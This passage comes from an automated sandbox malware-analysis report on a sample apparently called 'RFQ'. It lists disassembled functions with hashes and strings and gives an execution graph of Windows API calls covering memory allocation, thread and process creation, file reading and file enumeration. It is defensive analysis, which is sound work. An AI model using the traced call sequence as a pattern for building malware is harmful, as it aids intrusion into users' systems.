                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: ac44a5223d726df1e72995eb1a31bc55c7e9c4c9abe11eb472ef77a76b056c8d
                                                                                                        • Instruction ID: 43a3ad6897486dfd38d4388aa1192d99df8d7a39edcd60d5b5f66365a95418c9
                                                                                                        • Opcode Fuzzy Hash: ac44a5223d726df1e72995eb1a31bc55c7e9c4c9abe11eb472ef77a76b056c8d
                                                                                                        • Instruction Fuzzy Hash: 42513A356102197AEF21ABE9DD85FBE77BCEF18308F4800A9E605A7181E7709E458F50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01B06940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                        • Instruction ID: 400669211b449cf24f77edba6439714da1c1083712eb7b79c9dbc97647423b66
                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                        • Instruction Fuzzy Hash: 69021A71508742AFD70ADF18C990A6FBBE5EFC8700F048A6DF9894B294DB31E945CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: 680f3dd72b9caef1b6752b9ae22d1ca11686dac706fe6d961917fed82e30415d
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: 8E8190B0E062499EEF25CF6CCC917FEBBB2AF45320F1C4259D961A7291C7349A408B71
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AE20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 57ebd177efc6403f4b2daa445d3f2ebb99d6cc85cc19a9dc8d727eb5c641d8f1
                                                                                                        • Instruction ID: 7492470db6bb66d3c13bd74e4607ee9b1d169a215690509d287efa36e54864bf
                                                                                                        • Opcode Fuzzy Hash: 57ebd177efc6403f4b2daa445d3f2ebb99d6cc85cc19a9dc8d727eb5c641d8f1
                                                                                                        • Instruction Fuzzy Hash: C621327AA00219ABDB11DF79DD44AFEBBFCEF58754F440126E905E3200E734DA058BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AA02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 01AA031E
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AA02BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: c748c8c446593e65ab6e55ec1818eb42cd582b1a9ef6837f0f735ee894e53463
                                                                                                        • Instruction ID: b8ddb5d83acff11dfa9ab65f90f32650ee6362dd0a393a8a6d7b16c98f885907
                                                                                                        • Opcode Fuzzy Hash: c748c8c446593e65ab6e55ec1818eb42cd582b1a9ef6837f0f735ee894e53463
                                                                                                        • Instruction Fuzzy Hash: CCE1BD306087419FD765CF28C984B6ABBE0BF88314F140A2DFAA5CB2E1D774E944CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 01AA7B8E
                                                                                                        • RTL: Re-Waiting, xrefs: 01AA7BAC
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AA7B7F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: a7c906c2b142566cb9d5e3d0739df3240fb1bd212f4312d2bfd089d21b7173f8
                                                                                                        • Instruction ID: 9718b2590c9ea327ed10f27751d1a55d0c1ae6914641fca4f154dca6301336b4
                                                                                                        • Opcode Fuzzy Hash: a7c906c2b142566cb9d5e3d0739df3240fb1bd212f4312d2bfd089d21b7173f8
                                                                                                        • Instruction Fuzzy Hash: 4041E3713007029FD725DF29CD40B6BB7E9EF98710F100A2DE95ADB690DB32E8058BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AA728C
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 01AA72A3
                                                                                                        • RTL: Re-Waiting, xrefs: 01AA72C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AA7294
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: f503770498caa8a1992d26d3e3e882337c06140dbe40333a17151487b90009b1
                                                                                                        • Instruction ID: f64ef861a3414b6f8e2b1272f3037d0de3483e111800ad3947952ae639eb0009
                                                                                                        • Opcode Fuzzy Hash: f503770498caa8a1992d26d3e3e882337c06140dbe40333a17151487b90009b1
                                                                                                        • Instruction Fuzzy Hash: 3641F031700602ABD721DF69CC41BA6B7A9FB94710F140629F955EB241DB31E80687E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AE2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: 27deaf0568c084d1cda6385f7c0f59f4b6edc07609bd7f9d16b8220443189a51
                                                                                                        • Instruction ID: 7c2254b222388eb685428d9b5b6136cd399579dbe758c860ef128f5f86ba2ec4
                                                                                                        • Opcode Fuzzy Hash: 27deaf0568c084d1cda6385f7c0f59f4b6edc07609bd7f9d16b8220443189a51
                                                                                                        • Instruction Fuzzy Hash: B1314172A0021A9EDB21DF2DCD44BEEB7FCBB54710F44455AE949E3240EB30AA448FA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 2ffe568fdb33b0ce131ba17139fce7d86c6142566762c8220c04c9538f176c0d
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: 9291D171E002169BEB25CFADCD88ABEBBB5EF44320F58452AE955E72C0D7348B41CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 89157f9dea3731d11dd0e7f1abb03286247f0ba36eb9ea11ceac977f7d4e0324
                                                                                                        • Instruction ID: 6795246f36e7f1d6c3f14415db0d3b730e1f717c155c1f4a55f34640d86a4d33
                                                                                                        • Opcode Fuzzy Hash: 89157f9dea3731d11dd0e7f1abb03286247f0ba36eb9ea11ceac977f7d4e0324
                                                                                                        • Instruction Fuzzy Hash: C6811B72D002699BDB318F54CD44BEABBB4AF48714F0441DAEA1DB7280D7705E85CFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.6%
                                                                                                        Dynamic/Decrypted Code Coverage:3.9%
                                                                                                        Signature Coverage:2%
                                                                                                        Total number of Nodes:492
                                                                                                        Total number of Limit Nodes:78
                                                                                                        execution_graph 96156 30d23cc 96161 30d6a90 96156->96161 96160 30d23f1 96162 30d6aaa 96161->96162 96166 30d23dc 96161->96166 96170 30e6a10 96162->96170 96165 30e7310 NtClose 96165->96166 96166->96160 96167 30e7310 96166->96167 96168 30e732d 96167->96168 96169 30e733e NtClose 96168->96169 96169->96160 96171 30e6a2d 96170->96171 96174 39235c0 LdrInitializeThunk 96171->96174 96172 30d6b7a 96172->96165 96174->96172 96175 3922ad0 LdrInitializeThunk 96176 30d1a45 96177 30d1a62 96176->96177 96180 30d5290 96177->96180 96179 30d1a6d 96181 30d52c3 96180->96181 96182 30d52e7 96181->96182 96187 30e6e90 96181->96187 96182->96179 96184 30d530a 96184->96182 96185 30e7310 NtClose 96184->96185 96186 30d538a 96185->96186 96186->96179 96188 30e6ead 96187->96188 96191 3922ca0 LdrInitializeThunk 96188->96191 96189 30e6ed9 96189->96184 96191->96189 96192 30ca840 96195 30e9150 96192->96195 96194 30cbeb1 96198 30e7460 96195->96198 96197 30e9181 96197->96194 96199 30e74ed 96198->96199 96201 30e7487 96198->96201 96200 30e7503 NtAllocateVirtualMemory 96199->96200 96200->96197 96201->96197 96202 30c9080 96203 30c908f 96202->96203 96204 30c90cd 96203->96204 96205 30c90ba CreateThread 96203->96205 96206 30de200 96207 30de264 96206->96207 96208 30d5290 2 API calls 96207->96208 96210 30de38d 96208->96210 96209 30de394 96210->96209 96235 30d53a0 96210->96235 96212 30de533 96213 30de410 96213->96212 96214 30de542 96213->96214 96239 30ddfe0 96213->96239 96215 30e7310 NtClose 96214->96215 96217 30de54c 96215->96217 96218 30de445 96218->96214 96219 30de450 96218->96219 96248 30e92c0 96219->96248 96221 30de479 96222 30de498 96221->96222 96223 30de482 96221->96223 96251 30dded0 CoInitialize 96222->96251 96224 30e7310 NtClose 96223->96224 96226 30de48c 96224->96226 96227 30de4a6 96253 30e6df0 96227->96253 96229 30de522 96230 30e7310 NtClose 96229->96230 96231 30de52c 96230->96231 96257 30e91e0 96231->96257 96233 30de4c4 96233->96229 96234 30e6df0 LdrInitializeThunk 96233->96234 96234->96233 96236 30d53c5 96235->96236 96260 30e6c80 96236->96260 96240 30ddffc 96239->96240 96265 30d3780 96240->96265 96242 30de020 96242->96218 96243 30de017 96243->96242 96244 30d3780 LdrLoadDll 96243->96244 96245 30de0eb 96244->96245 96246 30d3780 LdrLoadDll 96245->96246 96247 30de148 96245->96247 96246->96247 96247->96218 96269 30e7620 96248->96269 96250 30e92db 96250->96221 96252 30ddf35 96251->96252 96252->96227 96254 30e6e0a 96253->96254 96272 3922ba0 LdrInitializeThunk 96254->96272 96255 30e6e3a 96255->96233 96273 30e7670 96257->96273 96259 30e91f9 96259->96212 96261 30e6c9a 96260->96261 96264 3922c60 LdrInitializeThunk 96261->96264 96262 30d5439 96262->96213 96264->96262 96266 30d37a4 96265->96266 96267 30d37ab 96266->96267 96268 30d37e0 LdrLoadDll 96266->96268 96267->96243 96268->96267 96270 30e763a 96269->96270 96271 30e764b RtlAllocateHeap 96270->96271 96271->96250 96272->96255 96274 30e768d 96273->96274 96275 30e769e RtlFreeHeap 96274->96275 96275->96259 96281 30e42c0 96282 30e431a 96281->96282 96284 30e4327 96282->96284 96285 30e1e60 96282->96285 96286 30e9150 NtAllocateVirtualMemory 96285->96286 96287 30e1ea1 96286->96287 96288 30e1fa6 96287->96288 96289 30d3780 LdrLoadDll 96287->96289 96288->96284 96291 30e1ee1 96289->96291 96290 30e1f20 Sleep 96290->96291 96291->96288 96291->96290 96292 30d4b42 96293 30d4ad8 96292->96293 96294 30d4b4b 96292->96294 96299 30e6970 96293->96299 96298 30d4afb 96300 30e698d 96299->96300 96308 3922c0a 96300->96308 96301 30d4ae6 96303 30e73a0 96301->96303 96304 30e7424 96303->96304 96306 30e73c4 96303->96306 96311 3922e80 LdrInitializeThunk 96304->96311 96305 30e7455 96305->96298 96306->96298 96309 3922c1f LdrInitializeThunk 96308->96309 96310 3922c11 96308->96310 96309->96301 96310->96301 96311->96305 96312 30d74de 96313 30d74e3 96312->96313 96318 30e37b0 96313->96318 96315 30d74ee 96316 30d74a2 96315->96316 96323 30d5f30 NtClose LdrInitializeThunk LdrInitializeThunk 96315->96323 96319 30e380d 96318->96319 96320 30e3844 96319->96320 96324 30e0180 96319->96324 96320->96315 96322 30e3826 96322->96315 96323->96316 96325 30e012d 96324->96325 96326 30e0124 96324->96326 96325->96322 96327 30e7310 NtClose 96326->96327 96327->96325 96328 30cfe10 96329 30cfe2a 96328->96329 96330 30d3780 LdrLoadDll 96329->96330 96331 30cfe45 96330->96331 96332 30cfe79 PostThreadMessageW 96331->96332 96333 30cfe8a 96331->96333 96332->96333 96335 30dfc61 96336 30dfc71 96335->96336 96348 30e7180 96336->96348 96338 30dfc82 96339 30dfcb5 96338->96339 96340 30dfca0 96338->96340 96342 30e7310 NtClose 96339->96342 96341 30e7310 NtClose 96340->96341 96343 30dfca9 96341->96343 96345 30dfcbe 96342->96345 96344 30dfcea 96345->96344 96346 30e91e0 RtlFreeHeap 96345->96346 96347 30dfcde 96346->96347 96349 30e71a4 96348->96349 96350 30e721c 96348->96350 96349->96338 96351 30e7232 NtReadFile 96350->96351 96351->96338 96352 30c90e0 96354 30c9443 96352->96354 96355 30c987b 96354->96355 96356 30e8e70 96354->96356 96357 30e8e96 96356->96357 96362 30c3d30 96357->96362 96359 30e8ea2 96361 30e8ed0 96359->96361 96365 30e3900 96359->96365 96361->96355 96369 30d24c0 96362->96369 96364 30c3d3d 96364->96359 96366 30e395a 96365->96366 96367 30e3967 96366->96367 96382 30d09b0 96366->96382 96367->96361 96370 30d24d7 96369->96370 96372 30d24f0 96370->96372 96373 30e7d60 96370->96373 96372->96364 96374 30e7d78 96373->96374 96375 30e37b0 NtClose 96374->96375 96377 30e7d93 96375->96377 96376 30e7d9c 96376->96372 96377->96376 96378 30e6970 LdrInitializeThunk 96377->96378 96379 30e7dee 96378->96379 96380 30e91e0 RtlFreeHeap 96379->96380 96381 30e7e07 96380->96381 96381->96372 96383 30d09eb 96382->96383 96406 30d6ba0 96383->96406 96385 30d09f3 96386 30e92c0 RtlAllocateHeap 96385->96386 96405 30d0cb0 96385->96405 96387 30d0a09 96386->96387 96388 30e92c0 RtlAllocateHeap 96387->96388 96389 30d0a17 96388->96389 96390 30e92c0 RtlAllocateHeap 96389->96390 96391 30d0a28 96390->96391 96417 30d4de0 96391->96417 96393 30d0a35 96394 30e37b0 NtClose 96393->96394 96398 30d0a89 96393->96398 96395 30d0a52 96394->96395 96396 30e37b0 NtClose 96395->96396 96397 30d0a63 96396->96397 96397->96398 96400 30e37b0 NtClose 96397->96400 96401 30d0ab8 96398->96401 96427 30d59e0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96398->96427 96400->96398 96402 30d3780 LdrLoadDll 96401->96402 96403 30d0c70 96402->96403 96423 30e6020 96403->96423 96405->96367 96407 30d6bcc 96406->96407 96408 30d6a90 2 API calls 96407->96408 96409 30d6bef 96408->96409 96410 30d6bf9 96409->96410 96411 30d6c11 96409->96411 96413 30d6c04 96410->96413 96414 30e7310 NtClose 96410->96414 96412 30d6c2d 96411->96412 96415 30e7310 NtClose 96411->96415 96412->96385 96413->96385 96414->96413 96416 30d6c23 96415->96416 96416->96385 96418 30d4df6 96417->96418 96420 30d4e00 96417->96420 96418->96393 96419 30d4ed3 96419->96393 96420->96419 96421 30e37b0 NtClose 96420->96421 96422 30d4f4f 96421->96422 96422->96393 96424 30e607a 96423->96424 96426 30e6087 96424->96426 96428 30d0cc0 96424->96428 96426->96405 96427->96401 96431 30d0ce0 96428->96431 96444 30d6e70 96428->96444 96430 30d11b8 96430->96426 96431->96430 96448 30dfaa0 96431->96448 96434 30d0ee1 96456 30ea3f0 96434->96456 96436 30d0d3b 96436->96430 96451 30ea2c0 96436->96451 96437 30d0f1e 96437->96430 96442 30cf990 LdrInitializeThunk 96437->96442 96465 30d6e10 96437->96465 96439 30d0ef6 96439->96437 96462 30cf990 96439->96462 96441 30d6e10 LdrInitializeThunk 96443 30d1049 96441->96443 96442->96437 96443->96437 96443->96441 96445 30d6e7d 96444->96445 96446 30d6e9c SetErrorMode 96445->96446 96447 30d6ea3 96445->96447 96446->96447 96447->96431 96449 30e9150 NtAllocateVirtualMemory 96448->96449 96450 30dfac1 96449->96450 96450->96436 96452 30ea2d6 96451->96452 96453 30ea2d0 96451->96453 96454 30e92c0 RtlAllocateHeap 96452->96454 96453->96434 96455 30ea2fc 96454->96455 96455->96434 96457 30ea360 96456->96457 96458 30ea3bd 96457->96458 96459 30e92c0 RtlAllocateHeap 96457->96459 96458->96439 96460 30ea39a 96459->96460 96461 30e91e0 RtlFreeHeap 96460->96461 96461->96458 96469 30e7580 96462->96469 96466 30d6e23 96465->96466 96474 30e6870 96466->96474 96468 30d6e4e 96468->96437 96470 30e759a 96469->96470 96473 3922c70 LdrInitializeThunk 96470->96473 96471 30cf9b2 96471->96443 96473->96471 96475 30e68e6 96474->96475 96476 30e6897 96474->96476 96479 3922dd0 LdrInitializeThunk 96475->96479 96476->96468 96477 30e690b 96477->96468 96479->96477 96480 30d5d20 96481 30d5d47 96480->96481 96484 30d6c40 96481->96484 96483 30d5d71 96485 30d6c5d 96484->96485 96491 30e6a60 96485->96491 96487 30d6cad 96488 30d6cb4 96487->96488 96496 30e6b40 96487->96496 96488->96483 96490 30d6cdd 96490->96483 96492 30e6af3 96491->96492 96493 30e6a87 96491->96493 96501 3922f30 LdrInitializeThunk 96492->96501 96493->96487 96494 30e6b2c 96494->96487 96497 30e6be5 96496->96497 96499 30e6b67 96496->96499 96502 3922d10 LdrInitializeThunk 96497->96502 96498 30e6c2a 96498->96490 96499->96490 96501->96494 96502->96498 96503 30d99a0 96508 30d96d0 96503->96508 96505 30d99ad 96523 30d9370 96505->96523 96507 30d99c9 96509 30d96f5 96508->96509 96535 30d7060 96509->96535 96512 30d9832 96512->96505 96514 30d9849 96514->96505 96515 30d9840 96515->96514 96518 30d9931 96515->96518 96550 30e15e0 96515->96550 96554 30d8dd0 96515->96554 96520 30d9989 96518->96520 96565 30d9130 96518->96565 96521 30e91e0 RtlFreeHeap 96520->96521 96522 30d9990 96521->96522 96522->96505 96524 30d9386 96523->96524 96527 30d9391 96523->96527 96525 30e92c0 RtlAllocateHeap 96524->96525 96525->96527 96526 30d93a7 96526->96507 96527->96526 96528 30d7060 GetFileAttributesW 96527->96528 96529 30d969e 96527->96529 96532 30e15e0 NtClose 96527->96532 96533 30d8dd0 2 API calls 96527->96533 96534 30d9130 2 API calls 96527->96534 96528->96527 96530 30d96b7 96529->96530 96531 30e91e0 RtlFreeHeap 96529->96531 96530->96507 96531->96530 96532->96527 96533->96527 96534->96527 96536 30d707f 96535->96536 96537 30d7091 96536->96537 96538 30d7086 GetFileAttributesW 96536->96538 96537->96512 96539 30e1740 96537->96539 96538->96537 96540 30e174e 96539->96540 96541 30e1755 96539->96541 96540->96515 96542 30d3780 LdrLoadDll 96541->96542 96543 30e1787 96542->96543 96544 30e1796 96543->96544 96571 30e1210 LdrLoadDll 96543->96571 96546 30e92c0 RtlAllocateHeap 96544->96546 96549 30e1931 96544->96549 96548 30e17af 96546->96548 96547 30e91e0 RtlFreeHeap 96547->96549 96548->96547 96548->96549 96549->96515 96551 30e15f6 96550->96551 96553 30e16f6 96550->96553 96552 30e37b0 NtClose 96551->96552 96551->96553 96552->96551 96553->96515 96555 30d8df6 96554->96555 96556 30e37b0 NtClose 96555->96556 96557 30d8e52 96556->96557 96572 30dc600 96557->96572 96559 30d8e5d 96561 30d8fe0 96559->96561 96562 30d8e7b 96559->96562 96560 30d8fc5 96560->96515 96561->96560 96563 30d8c90 RtlFreeHeap 96561->96563 96562->96560 96582 30d8c90 96562->96582 96563->96561 96566 30d9156 96565->96566 96567 30e37b0 NtClose 96566->96567 96568 30d91c7 96567->96568 96569 30dc600 2 API calls 96568->96569 96570 30d91d2 96569->96570 96570->96518 96571->96544 96573 30e37b0 NtClose 96572->96573 96574 30dc616 96573->96574 96575 30dc623 96574->96575 96576 30e37b0 NtClose 96574->96576 96575->96559 96577 30dc634 96576->96577 96577->96575 96578 30e37b0 NtClose 96577->96578 96579 30dc64f 96578->96579 96580 30e91e0 RtlFreeHeap 96579->96580 96581 30dc65c 96580->96581 96581->96559 96583 30d8ca6 96582->96583 96586 30dc670 96583->96586 96585 30d8dac 96585->96562 96587 30dc694 96586->96587 96588 30dc72c 96587->96588 96589 30e91e0 RtlFreeHeap 96587->96589 96588->96585 96589->96588 96590 30d4a20 96591 30d6e10 LdrInitializeThunk 96590->96591 96592 30d4a50 96591->96592 96594 30d4a7c 96592->96594 96595 30d6d90 96592->96595 96596 30d6dd4 96595->96596 96601 30d6df5 96596->96601 96602 30e6670 96596->96602 96598 30d6de5 96599 30d6e01 96598->96599 96600 30e7310 NtClose 96598->96600 96599->96592 96600->96601 96601->96592 96603 30e66e2 96602->96603 96604 30e6694 96602->96604 96607 3924650 LdrInitializeThunk 96603->96607 96604->96598 96605 30e6707 96605->96598 96607->96605 96608 30deae0 96609 30deafd 96608->96609 96610 30d3780 LdrLoadDll 96609->96610 96611 30deb18 96609->96611 96610->96611 96612 30d60e0 96613 30d60fc 96612->96613 96623 30d6146 96612->96623 96615 30e7310 NtClose 96613->96615 96613->96623 96614 30d626c 96616 30d6286 96614->96616 96617 30e37b0 NtClose 96614->96617 96618 30d6114 96615->96618 96617->96616 96624 30d5520 NtClose LdrInitializeThunk LdrInitializeThunk 96618->96624 96620 30d6246 96620->96614 96626 30d56f0 NtClose LdrInitializeThunk LdrInitializeThunk 96620->96626 96623->96614 96625 30d5520 NtClose LdrInitializeThunk LdrInitializeThunk 96623->96625 96624->96623 96625->96620 96626->96614 96627 30ea320 96628 30e91e0 RtlFreeHeap 96627->96628 96629 30ea335 96628->96629 96630 30e6920 96631 30e693a 96630->96631 96634 3922df0 LdrInitializeThunk 96631->96634 96632 30e6962 96634->96632 96640 30e7020 96641 30e70cf 96640->96641 96643 30e704b 96640->96643 96642 30e70e5 NtCreateFile 96641->96642 96644 30e00e0 96645 30e00fc 96644->96645 96646 30e0138 96645->96646 96647 30e0124 96645->96647 96648 30e7310 NtClose 96646->96648 96649 30e7310 NtClose 96647->96649 96651 30e0141 96648->96651 96650 30e012d 96649->96650 96654 30e9300 RtlAllocateHeap 96651->96654 96653 30e014c 96654->96653 96657 30d6338 96658 30d62ec 96657->96658 96659 30d6366 96657->96659 96664 30d9c00 96658->96664 96661 30d62f9 96662 30d630f 96661->96662 96670 30d9e90 96661->96670 96665 30d9c25 96664->96665 96666 30e37b0 NtClose 96665->96666 96668 30d9d92 96666->96668 96667 30d9e51 96667->96661 96668->96667 96669 30e37b0 NtClose 96668->96669 96669->96667 96672 30d9eb6 96670->96672 96671 30da0cf 96671->96662 96672->96671 96697 30e7700 96672->96697 96674 30d9f29 96674->96671 96675 30ea3f0 2 API calls 96674->96675 96676 30d9f45 96675->96676 96676->96671 96677 30da013 96676->96677 96678 30e6970 LdrInitializeThunk 96676->96678 96680 30d49a0 LdrInitializeThunk 96677->96680 96682 30da032 96677->96682 96679 30d9fa1 96678->96679 96679->96677 96684 30d9faa 96679->96684 96680->96682 96681 30d9ffb 96686 30d6e10 LdrInitializeThunk 96681->96686 96685 30da0b7 96682->96685 96703 30e6530 96682->96703 96683 30d9fd9 96718 30e2b00 LdrInitializeThunk 96683->96718 96684->96671 96684->96681 96684->96683 96700 30d49a0 96684->96700 96691 30d6e10 LdrInitializeThunk 96685->96691 96690 30da009 96686->96690 96690->96662 96693 30da0c5 96691->96693 96692 30da08e 96708 30e65d0 96692->96708 96693->96662 96695 30da0a8 96713 30e6710 96695->96713 96698 30e771d 96697->96698 96699 30e772e CreateProcessInternalW 96698->96699 96699->96674 96701 30e6b40 LdrInitializeThunk 96700->96701 96702 30d49de 96701->96702 96702->96683 96704 30e65a5 96703->96704 96706 30e6557 96703->96706 96719 39239b0 LdrInitializeThunk 96704->96719 96705 30e65ca 96705->96692 96706->96692 96709 30e6645 96708->96709 96711 30e65f7 96708->96711 96720 3924340 LdrInitializeThunk 96709->96720 96710 30e666a 96710->96695 96711->96695 96714 30e6785 96713->96714 96716 30e6737 96713->96716 96721 3922fb0 LdrInitializeThunk 96714->96721 96715 30e67aa 96715->96685 96716->96685 96718->96681 96719->96705 96720->96710 96721->96715 96722 30d88bb 96723 30d88ca 96722->96723 96724 30d88d1 96723->96724 96725 30e91e0 RtlFreeHeap 96723->96725 96725->96724 96726 30db130 96727 30db159 96726->96727 96728 30db25c 96727->96728 96729 30db200 FindFirstFileW 96727->96729 96729->96728 